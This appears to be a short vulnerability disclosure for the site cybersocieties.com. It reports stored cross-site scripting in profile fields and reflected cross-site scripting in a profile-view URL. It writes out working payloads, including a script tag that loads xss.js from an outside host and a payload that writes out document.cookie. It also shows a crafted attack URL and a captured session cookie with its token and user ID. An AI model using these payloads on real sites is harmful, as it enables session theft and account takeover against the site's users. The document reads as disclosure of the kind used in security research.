Cybersocieties.com - XSS & cookie disclosure
Cybersocieties.com
Homepage:
http://www.cybersocieties.com
Effected files:
* Input boxes in profile:
- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box
* Viewing a profile
------------------------------------------------------
XSS vuln via input boxes in profile:
No filter evasion is needed. For PoC try putting the following codesin one of
theboxes mentioned above:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
or:
<IMG SRC=javascript:alert('XSS')>
or:
<IMG SRC="javascript:document.write(document.cookie)">
etc
Screenshots:
http://www.youfucktard.com/xsp/cyberso1.jpg
http://www.youfucktard.com/xsp/cyberso2.jpg
http://www.youfucktard.com/xsp/cyberso3.jpg
Our Cookie:
This is remote text via xss.js located at youfucktard.com
CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506
--------------------------------------------------------
Viewing a profile XSS vuln PoC:
http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3">">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<'
Screenshot:
http://www.youfucktard.com/xsp/cyberso4.jpg